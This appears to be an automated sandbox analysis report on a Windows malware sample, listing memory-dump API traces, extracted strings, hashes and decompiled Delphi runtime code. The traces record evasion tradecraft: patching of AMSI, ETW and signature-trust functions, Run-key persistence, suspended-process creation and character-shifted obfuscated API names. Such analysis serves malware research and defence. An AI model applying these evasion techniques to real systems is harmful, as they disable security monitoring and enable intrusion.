GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6590 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A65B1 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A65D2 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A65F3 LoadLibraryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 035A6613 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6631 LoadLibraryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 035A6651 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A666F GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6690 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A66B1

Strings

swdsmnBc`dqgSsdF , xrefs: 035A634B @dbqtnrdQcmhE , xrefs: 035A63CF dbqtnrdQjbnK , xrefs: 035A6432 @gs`OqdcknEk`hbdoRsdFGR , xrefs: 035A669D @dkhEds`dqB , xrefs: 035A655B @dka`stbdwDcmhE , xrefs: 035A667C @rdl`MdbqtnrdQltmD , xrefs: 035A6474 dkhEc`dQ , xrefs: 035A657C wDbnkk@k`tsqhU , xrefs: 035A63AE dkcm`GdrnkB , xrefs: 035A65BE dkhEdshqV , xrefs: 035A659D xqnldLrrdbnqOdshqV , xrefs: 035A632A dcnLqnqqDsdR , xrefs: 035A64F8 xqnldLrrdbnqOc`dQ , xrefs: 035A6309 @xqnsbdqhCrvncmhVsdF , xrefs: 035A64D7 c`dqgSdltrdQ , xrefs: 035A62E8 @gs`OoldSsdF , xrefs: 035A64B6 kkc-12kkdgr , xrefs: 035A663E dbqtnrdQc`nK , xrefs: 035A6411 dbqtnrdQendyhR , xrefs: 035A63F0 @dstbdwDkkdgR , xrefs: 035A665B @dmhKcm`llnBsdF , xrefs: 035A6519 kkc-okgdf`lh , xrefs: 035A6600 qdsmhnOdkhEsdR , xrefs: 035A65DF dbqtnrdQddqE , xrefs: 035A6453 @xqnsbdqhCldsrxRsdF , xrefs: 035A6495 @dkhEdsdkdC , xrefs: 035A653A kkc-12kdmqdj , xrefs: 035A62CB @rrdbnqOds`dqB , xrefs: 035A638D rsrhwDgs`OxqnsbdqhCdqtRdj`L , xrefs: 035A661D swdsmnBc`dqgSsdR , xrefs: 035A636C

Memory Dump Source

Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true

Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp Download File Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad String ID: @dbqtnrdQcmhE$@dka`stbdwDcmhE$@dkhEds`dqB$@dkhEdsdkdC$@dmhKcm`llnBsdF$@dstbdwDkkdgR$@gs`OoldSsdF$@gs`OqdcknEk`hbdoRsdFGR$@rdl`MdbqtnrdQltmD$@rrdbnqOds`dqB$@xqnsbdqhCldsrxRsdF$@xqnsbdqhCrvncmhVsdF$c`dqgSdltrdQ$dbqtnrdQc`nK$dbqtnrdQddqE$dbqtnrdQendyhR$dbqtnrdQjbnK$dcnLqnqqDsdR$dkcm`GdrnkB$dkhEc`dQ$dkhEdshqV$kkc-12kdmqdj$kkc-12kkdgr$kkc-okgdf`lh$qdsmhnOdkhEsdR$rsrhwDgs`OxqnsbdqhCdqtRdj`L$swdsmnBc`dqgSsdF$swdsmnBc`dqgSsdR$wDbnkk@k`tsqhU$xqnldLrrdbnqOc`dQ$xqnldLrrdbnqOdshqV API String ID: 2238633743-988113358 Opcode ID: ff146f615586b97877e1e8ad7ce169a9605353ce4f02d3a9603a7fb1f0f0184a Instruction ID: 2b5fd27d89ef1b51d2f228657cce057568a7145288ea809198bcc089c2e4706c Opcode Fuzzy Hash: ff146f615586b97877e1e8ad7ce169a9605353ce4f02d3a9603a7fb1f0f0184a Instruction Fuzzy Hash: 3FB193B8A1070AAFDB00FBB9FC9089FB7F8BB84254F144516B4019F635DB745D06ABA1

Uniqueness

Uniqueness Score: -1.00%

APIs

Part of subcall function 035A3CC8: RegCloseKey.ADVAPI32(10000000,035A3BC8,00000001,035A3C46,?,?,035A6F5D), ref: 035A3CDC Part of subcall function 035A3D2C: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000,035A3E31), ref: 035A3DA6 Part of subcall function 035A3C98: RegFlushKey.ADVAPI32(00010000,035A3BC8,035A3CEF,035A3BC8,00000001,035A3C46,?,?,035A6F5D), ref: 035A3CA9 Part of subcall function 035A3C98: RegCloseKey.ADVAPI32(00010000,035A3BC8,035A3CEF,035A3BC8,00000001,035A3C46,?,?,035A6F5D), ref: 035A3CB2 Part of subcall function 035A552C: LoadLibraryA.KERNEL32(00000000,00000000,035A55B1,?,?,00000000), ref: 035A5565 Part of subcall function 035A552C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,035A55B1,?,?,00000000), ref: 035A556D Part of subcall function 035A552C: GetProcAddress.KERNEL32(00000000,00000000), ref: 035A558F VirtualProtect.KERNEL32(035A4E54,00000008,00000040,738C4620,035AD3D4,035A4E54,00000008,00000040,00000000,00000000,DllRegisterServer,035A4E54,00000008,00000040,00000000,00000000), ref: 035A70DF VirtualProtect.KERNEL32(035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035AD3D4,035A4E54,00000008,00000040,00000000,00000000,DllRegisterServer,035A4E54), ref: 035A7107 VirtualProtect.KERNEL32(035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035AD3D4,035A4E54,00000008,00000040), ref: 035A712F VirtualProtect.KERNEL32(035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620), ref: 035A7157 VirtualProtect.KERNEL32(035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620), ref: 035A717F VirtualProtect.KERNEL32(035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620), ref: 035A71A7 LoadLibraryA.KERNEL32(softpub,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040), ref: 035A71B1 GetProcAddress.KERNEL32(00000000,DriverInitializePolicy), ref: 035A71BE VirtualProtect.KERNEL32(035A4E54,00000008,00000040,738C4620,00000000,DriverInitializePolicy,softpub,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035A4E54), ref: 035A71D7 LoadLibraryA.KERNEL32(wuapi,035A4E54,00000008,00000040,738C4620,00000000,DriverInitializePolicy,softpub,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620), ref: 035A72CB GetProcAddress.KERNEL32(00000000,00000000), ref: 035A72EF VirtualProtect.KERNEL32(035A4E54,00000008,00000040,7763B230,00000000,00000000,wuapi,035A4E54,00000008,00000040,738C4620,00000000,DriverInitializePolicy,softpub,035A4E54,00000008), ref: 035A7308 GetProcAddress.KERNEL32(00000000,00000000), ref: 035A732A VirtualProtect.KERNEL32(035A4E54,00000008,00000040,7763B230,00000000,00000000,035A4E54,00000008,00000040,7763B230,00000000,00000000,wuapi,035A4E54,00000008,00000040), ref: 035A7343 ExitProcess.KERNEL32(00000000,035A4E54,00000008,00000040,7763B230,00000000,00000000,035A4E54,00000008,00000040,7763B230,00000000,00000000,wuapi,035A4E54,00000008), ref: 035A75AC Part of subcall function 035A48A8: CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 035A48ED Part of subcall function 035A48A8: ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 035A490E

Strings

AmsiOpenSession , xrefs: 035A707B, 035A7451 wuapi , xrefs: 035A72C6 revreSretsigeRllD , xrefs: 035A72D8 DllRegisterServer , xrefs: 035A74BA, 035A7523 DllCanUnloadNow , xrefs: 035A7569 AmsiInitialize , xrefs: 035A7500 EtwEventWrite , xrefs: 035A7012, 035A73E8 Contacts , xrefs: 035A6F96 DllGetClassObject , xrefs: 035A74DD, 035A7546 amsiproxy , xrefs: 035A7528, 035A754B, 035A756E, 035A7591 SOFTWARE\Microsoft\Windows\CurrentVersion\Run , xrefs: 035A6F7C AddPersonalTrustDBPages , xrefs: 035A70C1 amsi , xrefs: 035A703A, 035A705D, 035A7080, 035A70A3, 035A7410, 035A7433, 035A7456, 035A7479, 035A749C, 035A74BF, 035A74E2, 035A7505 DriverInitializePolicy , xrefs: 035A71B8 DllUnregisterServer , xrefs: 035A758C SoftpubCheckCert , xrefs: 035A7161 SoftpubDefCertInit , xrefs: 035A7139 AmsiScanString , xrefs: 035A7035, 035A740B OfficeInitializePolicy , xrefs: 035A7189 softpub , xrefs: 035A70C6, 035A70EE, 035A7116, 035A713E, 035A7166, 035A718E softpub , xrefs: 035A71AC AmsiUacInitialize , xrefs: 035A709E, 035A7474 HTTPSCertificateTrust , xrefs: 035A70E9 ntdll , xrefs: 035A7017, 035A73ED AmsiUacScan , xrefs: 035A7497 SoftpubLoadSignature , xrefs: 035A7111 AmsiScanBuffer , xrefs: 035A7058, 035A742E tcejbOssalCteGllD , xrefs: 035A7313 .url , xrefs: 035A6FB6

Memory Dump Source

Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true

Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp Download File Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp Download File

Similarity

API ID: ProtectVirtual$AddressProc$LibraryLoad$CloseProcess$CreateExitFlushHandleModuleOpenResumeThread String ID: .url$AddPersonalTrustDBPages$AmsiInitialize$AmsiOpenSession$AmsiScanBuffer$AmsiScanString$AmsiUacInitialize$AmsiUacScan$Contacts$DllCanUnloadNow$DllGetClassObject$DllRegisterServer$DllUnregisterServer$DriverInitializePolicy$EtwEventWrite$HTTPSCertificateTrust$OfficeInitializePolicy$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$SoftpubCheckCert$SoftpubDefCertInit$SoftpubLoadSignature$amsi$amsiproxy$ntdll$revreSretsigeRllD$softpub$softpub$tcejbOssalCteGllD$wuapi API String ID: 3091534625-2714927154 Opcode ID: 5a8ccc9ec2caab73b0ac80a8eb5e1aad097f6e41829663d47ab6b1954964f980 Instruction ID: cabed5e1c35ddb713e1279691b77ca5e5a2e995b0115e4358785679504551983 Opcode Fuzzy Hash: 5a8ccc9ec2caab73b0ac80a8eb5e1aad097f6e41829663d47ab6b1954964f980 Instruction Fuzzy Hash: 4AD10DA8340E4A6FDA00F6EDF861E1D32F2FBCA500F605446A1145FB79DB60DD0ABB56

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 41%

E00455934(void* __eax, void* __ebx, void* __ecx) { struct _WNDCLASSA _v44; char _v48; char* _t22; CHAR* _t26; struct HINSTANCE__* _t27; intOrPtr* _t29; signed int _t32; intOrPtr* _t33; signed int _t36; struct HINSTANCE__* _t37; void* _t39; CHAR* _t40; struct HWND__* _t41; char* _t47; char* _t52; long _t55; long _t59; struct HINSTANCE__* _t62; intOrPtr _t64; void* _t69; struct HMENU__* _t70; intOrPtr _t77; void* _t83; short _t88; _v48 = 0; _t69 = __eax; _push(_t83); _push(0x455ad5); _push( *[fs:eax]); *[fs:eax] = _t83 + 0xffffffd4; if( *((char*)(__eax + 0xac)) != 0) { L13: _pop(_t77); *[fs:eax] = _t77; _push(0x455adc); return E0040473C( &_v48); } _t22 = *0x462e14; // 0x46304c if( *_t22 != 0) { goto L13; } *(_t69 + 0x40) = E00421724(E0045603C, __eax); *0x4627b4 = L00406E54; _t26 = *0x4627d4; // 0x4555d0 _t27 = *0x4657f8; // 0x400000 if(GetClassInfoA(_t27, _t26, &_v44) == 0) { _t62 = *0x4657f8; // 0x400000 *0x4627c0 = _t62; _t88 = RegisterClassA(0x4627b0); if(_t88 == 0) { _t64 = *0x462b54; // 0x423558 E00406740(_t64, &_v48); E0040C11C(_v48, 1); E00404184(); } } _t29 = *0x462c28; // 0x466310 _t32 = *((intOrPtr*)( *_t29))(0) >> 1; if(_t88 < 0) { asm("adc eax, 0x0"); } _t33 = *0x462c28; // 0x466310 _t36 = *((intOrPtr*)( *_t33))(1, _t32) >> 1; if(_t88 < 0) { asm("adc eax, 0x0"); } _push(_t36); _push(0); _push(0); _push(0); _push(0); _t37 = *0x4657f8; // 0x400000 _push(_t37); _push(0); _t7 = _t69 + 0x8c; // 0x69746163 _t39 = E00404C00( *_t7); _t40 = *0x4627d4; // 0x4555d0, executed _t41 = E00407364(_t40, _t39); // executed *(_t69 + 0x30) = _t41; _t9 = _t69 + 0x8c; // 0x44c90c E0040473C(_t9); *((char*)(_t69 + 0xac)) = 1; _t11 = _t69 + 0x40; // 0x10cc0000 _t12 = _t69 + 0x30; // 0xe SetWindowLongA( *_t12, 0xfffffffc, *_t11); _t47 = *0x462cb4; // 0x4664f8 if( *_t47 != 0) { _t55 = E00456750(_t69); _t13 = _t69 + 0x30; // 0xe SendMessageA( *_t13, 0x80, 1, _t55); // executed _t59 = E00456750(_t69); _t14 = _t69 + 0x30; // 0xe SetClassLongA( *_t14, 0xfffffff2, _t59); } _t15 = _t69 + 0x30; // 0xe _t70 = GetSystemMenu( *_t15, 0); DeleteMenu(_t70, 0xf030, 0); DeleteMenu(_t70, 0xf000, 0); _t52 = *0x462cb4; // 0x4664f8 if( *_t52 != 0) { DeleteMenu(_t70, 0xf010, 0); } goto L13; } 0x0045593d 0x00455940 0x00455944 0x00455945 0x0045594a 0x0045594d 0x00455957 0x00455abf 0x00455ac1 0x00455ac4 0x00455ac7 0x00455ad4 0x00455ad4 0x0045595d 0x00455965 0x00000000 0x00000000 0x00455976 0x0045597e 0x00455987 0x0045598d 0x0045599a 0x0045599c 0x004559a1 0x004559b0 0x004559b3 0x004559b8 0x004559bd 0x004559cc 0x004559d1 0x004559d1 0x004559b3 0x004559d8 0x004559e1 0x004559e3 0x004559e5 0x004559e5 0x004559eb 0x004559f4 0x004559f6 0x004559f8 0x004559f8 0x004559fb 0x004559fc 0x004559fe 0x00455a00 0x00455a02 0x00455a04 0x00455a09 0x00455a0a 0x00455a0c 0x00455a12 0x00455a1e 0x00455a23 0x00455a28 0x00455a2b 0x00455a31 0x00455a36 0x00455a3d 0x00455a43 0x00455a47 0x00455a4c 0x00455a54 0x00455a58 0x00455a65 0x00455a69 0x00455a70 0x00455a78 0x00455a7c 0x00455a7c 0x00455a83 0x00455a8c 0x00455a96 0x00455aa3 0x00455aa8 0x00455ab0 0x00455aba 0x00455aba 0x00000000

APIs

Part of subcall function 00421724: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00421742 GetClassInfoA.USER32 ref: 00455993 RegisterClassA.USER32 ref: 004559AB Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772 SetWindowLongA.USER32(0000000E,000000FC,10CC0000), ref: 00455A47 SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00455A69 SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455A7C GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455A87 DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455A96 DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455AA3 DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455ABA

Strings

X5B , xrefs: 004559B8 L0F , xrefs: 0045595D Tn@ , xrefs: 0045597E

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow String ID: L0F$Tn@$X5B API String ID: 2103932818-3306811505 Opcode ID: 1061d3b833ce9895d9cf07967922cd786b4ec16f4d71d80d9c33e4b0a42dfe87 Instruction ID: 8b2a45e2b46d75add65d1c0541aee3cefa7279e0c305bd2f6c4295ac0c4b2ff4 Opcode Fuzzy Hash: 1061d3b833ce9895d9cf07967922cd786b4ec16f4d71d80d9c33e4b0a42dfe87 Instruction Fuzzy Hash: 62418070600700AFE710EF69DD92F6A3399AB04715F55417AFD00EB2D3EAB9AC448B6D

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%

E004478D4(void* __ebx, void* __edi, void* __eflags) { char _v8; char _v12; char _v16; char _v20; char _v24; long _v28; char _v32; char _v36; intOrPtr _t25; short _t27; char _t29; intOrPtr _t35; intOrPtr _t38; intOrPtr _t47; intOrPtr _t49; intOrPtr* _t50; intOrPtr _t53; struct HINSTANCE__* _t63; intOrPtr* _t78; intOrPtr* _t80; intOrPtr _t83; void* _t87; _v20 = 0; _v8 = 0; _push(_t87); _push(0x447a4c); _push( *[fs:eax]); *[fs:eax] = _t87 + 0xffffffe0; _v16 = GetCurrentProcessId(); _v12 = 0; E0040970C("Delphi%.8X", 0, &_v16, &_v8); E00404790(0x466504, _v8); _t25 = *0x466504; // 0x27ea898 _t27 = GlobalAddAtomA(E00404C00(_t25)); // executed *0x466500 = _t27; _t29 = *0x4657f8; // 0x400000 _v36 = _t29; _v32 = 0; _v28 = GetCurrentThreadId(); _v24 = 0; E0040970C("ControlOfs%.8X%.8X", 1, &_v36, &_v20); E00404790(0x466508, _v20); _t35 = *0x466508; // 0x27f1cc0 *0x466502 = GlobalAddAtomA(E00404C00(_t35)); _t38 = *0x466508; // 0x27f1cc0 *0x46650c = RegisterWindowMessageA(E00404C00(_t38)); *0x466544 = E0041AA24(1); E004474DC(); *0x4664ec = E00447288(1, 1); _t47 = E004543D8(1, __edi); _t78 = *0x462f14; // 0x466584 *_t78 = _t47; _t49 = E004555E0(0, 1); _t80 = *0x462da4; // 0x466580 *_t80 = _t49; _t50 = *0x462da4; // 0x466580 E00457684( *_t50, 1); _t53 = *0x434ea4; // 0x434ea8 E0041A1CC(_t53, 0x4376cc, 0x4376dc); _t63 = GetModuleHandleA("USER32"); if(_t63 != 0) { *0x46255c = GetProcAddress(_t63, "AnimateWindow"); } _pop(_t83); *[fs:eax] = _t83; _push(0x447a53); E0040473C( &_v20); return E0040473C( &_v8); } 0x004478dd 0x004478e0 0x004478e5 0x004478e6 0x004478eb 0x004478ee 0x004478fa 0x004478fd 0x0044790b 0x00447918 0x0044791d 0x00447928 0x0044792d 0x00447937 0x0044793c 0x0044793f 0x00447948 0x0044794b 0x0044795c 0x00447969 0x0044796e 0x0044797e 0x00447984 0x00447994 0x004479a5 0x004479aa 0x004479bb 0x004479c9 0x004479ce 0x004479d4 0x004479df 0x004479e4 0x004479ea 0x004479ec 0x004479f5 0x00447a04 0x00447a09 0x00447a18 0x00447a1c 0x00447a29 0x00447a29 0x00447a30 0x00447a33 0x00447a36 0x00447a3e 0x00447a4b

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00447A4C), ref: 004478F5 GlobalAddAtomA.KERNEL32 ref: 00447928 GetCurrentThreadId.KERNEL32 ref: 00447943 GlobalAddAtomA.KERNEL32 ref: 00447979 RegisterWindowMessageA.USER32(00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 0044798F Part of subcall function 0041AA24: InitializeCriticalSection.KERNEL32(00418518,?,?,004479A5,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 0041AA43 Part of subcall function 004474DC: SetErrorMode.KERNEL32(00008000), ref: 004474F5 Part of subcall function 004474DC: GetModuleHandleA.KERNEL32(USER32,00000000,00447642,?,00008000), ref: 00447519 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00447526 Part of subcall function 004474DC: LoadLibraryA.KERNEL32(imm32.dll,00000000,00447642,?,00008000), ref: 00447542 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00447564 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00447579 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 0044758E Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004475A3 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004475B8 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004475CD Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004475E2 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004475F7 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 0044760C Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00447621 Part of subcall function 004474DC: SetErrorMode.KERNEL32(?,00447649,00008000), ref: 0044763C Part of subcall function 004543D8: GetKeyboardLayout.USER32 ref: 0045441D Part of subcall function 004543D8: GetDC.USER32(00000000), ref: 00454472 Part of subcall function 004543D8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045447C Part of subcall function 004543D8: ReleaseDC.USER32 ref: 00454487 Part of subcall function 004555E0: LoadIconA.USER32 ref: 004556D7 Part of subcall function 004555E0: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00455709 Part of subcall function 004555E0: OemToCharA.USER32 ref: 0045571C Part of subcall function 004555E0: CharNextA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000), ref: 0045575B Part of subcall function 004555E0: CharLowerA.USER32(00000000,?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?), ref: 00455761 GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00447A13 GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00447A24

Strings

0sC , xrefs: 004479B1 USER32 , xrefs: 00447A0E Delphi%.8X , xrefs: 00447906 ControlOfs%.8X%.8X , xrefs: 00447957 AnimateWindow , xrefs: 00447A1E

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CharModule$AtomCurrentErrorGlobalHandleLoadMode$CapsCriticalDeviceFileIconInitializeKeyboardLayoutLibraryLowerMessageNameNextProcessRegisterReleaseSectionThreadWindow String ID: 0sC$AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32 API String ID: 1515865724-1439261924 Opcode ID: 1cab24320c825aae389d2ad9d806f951871264bbd0d0d4677ce10ca45a00fae6 Instruction ID: dcfdd3a89ae3525500325092b6b3c25abddc81a31b1afbe156e43ea57f3249c9 Opcode Fuzzy Hash: 1cab24320c825aae389d2ad9d806f951871264bbd0d0d4677ce10ca45a00fae6 Instruction Fuzzy Hash: 634193B0604205AFD700EFA9ED42A8D77F5EB44308B01457BF401F73A2EB79A9008B5E

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%

E004555E0(void* __ecx, char __edx) { char _v5; char _v261; void* __ebx; void* __ebp; intOrPtr _t42; intOrPtr _t45; intOrPtr _t46; struct HINSTANCE__** _t58; intOrPtr _t63; struct HINSTANCE__** _t65; void* _t72; char* _t74; CHAR* _t76; intOrPtr _t80; char* _t81; intOrPtr _t87; intOrPtr* _t94; intOrPtr* _t95; intOrPtr _t96; void* _t97; char _t99; void* _t111; void* _t112; _t99 = __edx; _t97 = __ecx; if(__edx != 0) { _t112 = _t112 + 0xfffffff0; _t42 = E00403C34(_t42, _t111); } _v5 = _t99; _t96 = _t42; E00420664(_t97, 0); _t45 = *0x462d08; // 0x461bc8 if( *((short*)(_t45 + 2)) == 0) { _t95 = *0x462d08; // 0x461bc8 *((intOrPtr*)(_t95 + 4)) = _t96; *_t95 = 0x457090; } _t46 = *0x462dc0; // 0x461bd0 if( *((short*)(_t46 + 2)) == 0) { _t94 = *0x462dc0; // 0x461bd0 *((intOrPtr*)(_t94 + 4)) = _t96; *_t94 = E0045729C; } *((char*)(_t96 + 0x34)) = 0; *((intOrPtr*)(_t96 + 0x90)) = E004038F8(1); *((intOrPtr*)(_t96 + 0x98)) = E004038F8(1); *((intOrPtr*)(_t96 + 0xb0)) = E004038F8(1); *((intOrPtr*)(_t96 + 0x60)) = 0; *((intOrPtr*)(_t96 + 0x84)) = 0; *((intOrPtr*)(_t96 + 0x5c)) = 0xff000018; *((intOrPtr*)(_t96 + 0x78)) = 0x1f4; *((char*)(_t96 + 0x7c)) = 1; *((intOrPtr*)(_t96 + 0x80)) = 0; *((intOrPtr*)(_t96 + 0x74)) = 0x9c4; *((char*)(_t96 + 0x88)) = 0; *((char*)(_t96 + 0xa5)) = 1; *((char*)(_t96 + 0xbc)) = 1; _t110 = E0042A7FC(1); *((intOrPtr*)(_t96 + 0xa0)) = _t57; _t58 = *0x462c04; // 0x463030 E0042ABD0(_t110, LoadIconA( *_t58, "MAINICON")); _t21 = _t96 + 0xa0; // 0x736d _t63 = *_t21; *((intOrPtr*)(_t63 + 0x14)) = _t96; *((intOrPtr*)(_t63 + 0x10)) = 0x45795c; _t65 = *0x462c04; // 0x463030 GetModuleFileNameA( *_t65, &_v261, 0x100); OemToCharA( &_v261, &_v261); _t72 = E0040CEC8( &_v261, 0x5c); if(_t72 != 0) { _t28 = _t72 + 1; // 0x1 E00409044( &_v261, _t28); } _t74 = E0040CEFC( &_v261, 0x2e); if(_t74 != 0) { *_t74 = 0; } _t76 = CharNextA( &_v261); // executed CharLowerA(_t76); _t32 = _t96 + 0x8c; // 0x44c90c E004049AC(_t32, 0x100, &_v261); *((char*)(_t96 + 0xd4)) = 0; _t80 = E004217E0(0x456bf0, _t96); // executed *((intOrPtr*)(_t96 + 0xc8)) = _t80; _t81 = *0x462adc; // 0x463038 if( *_t81 == 0) { E00455934(_t96, _t96, 0x100); // executed } *((char*)(_t96 + 0x59)) = 1; *((char*)(_t96 + 0x5a)) = 1; *((char*)(_t96 + 0x5b)) = 1; *((char*)(_t96 + 0xa6)) = 1; *((intOrPtr*)(_t96 + 0xa8)) = 0; E00457B38(_t96, 0x100); E00458698(_t96); _t87 = _t96; if(_v5 != 0) { E00403C8C(_t87); _pop( *[fs:0x0]); } return _t96; } 0x004555e0 0x004555e0 0x004555ed 0x004555ef 0x004555f2 0x004555f2 0x004555f7 0x004555fa 0x00455600 0x00455605 0x0045560f 0x00455611 0x00455616 0x00455619 0x00455619 0x0045561f 0x00455629 0x0045562b 0x00455630 0x00455633 0x00455633 0x00455639 0x00455649 0x0045565b 0x0045566d 0x00455675 0x0045567a 0x00455680 0x00455687 0x0045568e 0x00455694 0x0045569a 0x004556a1 0x004556a8 0x004556af 0x004556c2 0x004556c4 0x004556cf 0x004556e0 0x004556e5 0x004556e5 0x004556eb 0x004556ee 0x00455701 0x00455709 0x0045571c 0x00455729 0x00455730 0x00455732 0x0045573b 0x0045573b 0x00455748 0x0045574f 0x00455751 0x00455751 0x0045575b 0x00455761 0x00455766 0x00455777 0x0045577c 0x00455789 0x0045578e 0x00455794 0x0045579c 0x004557a0 0x004557a0 0x004557a5 0x004557a9 0x004557ad 0x004557b1 0x004557ba 0x004557c2 0x004557c9 0x004557ce 0x004557d4 0x004557d6 0x004557db 0x004557e2 0x004557ec

APIs

LoadIconA.USER32 ref: 004556D7 GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00455709 OemToCharA.USER32 ref: 0045571C CharNextA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000), ref: 0045575B CharLowerA.USER32(00000000,?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?), ref: 00455761 Part of subcall function 00455934: GetClassInfoA.USER32 ref: 00455993 Part of subcall function 00455934: RegisterClassA.USER32 ref: 004559AB Part of subcall function 00455934: SetWindowLongA.USER32(0000000E,000000FC,10CC0000), ref: 00455A47 Part of subcall function 00455934: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00455A69

Strings

80F , xrefs: 00455794 MAINICON , xrefs: 004556CA 00F , xrefs: 004556CF, 00455701

Memory Dump Source

